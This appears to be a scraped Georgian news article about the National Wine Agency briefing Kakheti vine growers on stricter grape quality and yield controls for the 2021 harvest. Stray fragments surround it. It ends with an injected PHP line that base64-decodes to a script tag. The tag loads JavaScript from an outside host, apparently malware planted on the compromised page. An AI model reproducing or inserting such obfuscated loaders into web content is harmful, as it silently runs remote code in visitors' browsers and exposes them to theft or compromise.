celsiusi
ავერსი შნაიდერი
გრძელდება შეხვედრები კახეთის რეგიონში, სადაც ღვინის ეროვნული სააგენტოს წარმოადგენლებმა მევენახეებს "რთველი 2021"-ის პროცესში დაგეგმილ სიახლეებს გააცნეს. 
 
როგორც საინფორმაციო სააგენტო "ბიზნესთაიმს" ღვინის ეროვნული სააგენტოდან აცნობეს, ქართული ღვინის ხარისხის გაუმჯობესების მიზნით, რთველი 2021-ის ფარგლებში, ყურძნის ხარისხის კონტროლი გამკაცრდება. ჩასაბარებელი ყურძნის ხარისხს შესაბამისი ნორმატიული დოკუმენტაციებით დადგენილი შაქრიანობა განსაზღვრავს, რაც შემდგომ მის საბაზრო ღირებულებაზეც აისახება.
 
კონტროლი განხორციელდება ადგილწარმოშობის ჯიშების სპეციფიკაციებით განსაზღვრულ მოსავლიანობის ლიმიტზე. 
 
გასული ორი კვირის მანძილზე, შეხვედრები კახეთის რეგიონის ათობით სოფელში გაიმართა. გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს საინფორმაციო-საკონსულტაციო სამსახურების მიერ მევენეხეებთან შეხვედრები კახეთის ყველა მუნიციპალიტეტის სოფლებში დაიგეგმა. 
 
ქართული ღვინის ხარისხის გაუმჯობესება მუდმივი პროცესია და სწორედ ვენახის მოვლასა და ყურძნის კონდიციაზეა დამოკიდებული ქართული ღვინის ხარისხი, მისი საერთაშორისო რეპუტაცია და შესაბამისად, საექსპორტო ფასი.
 
 
1696
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");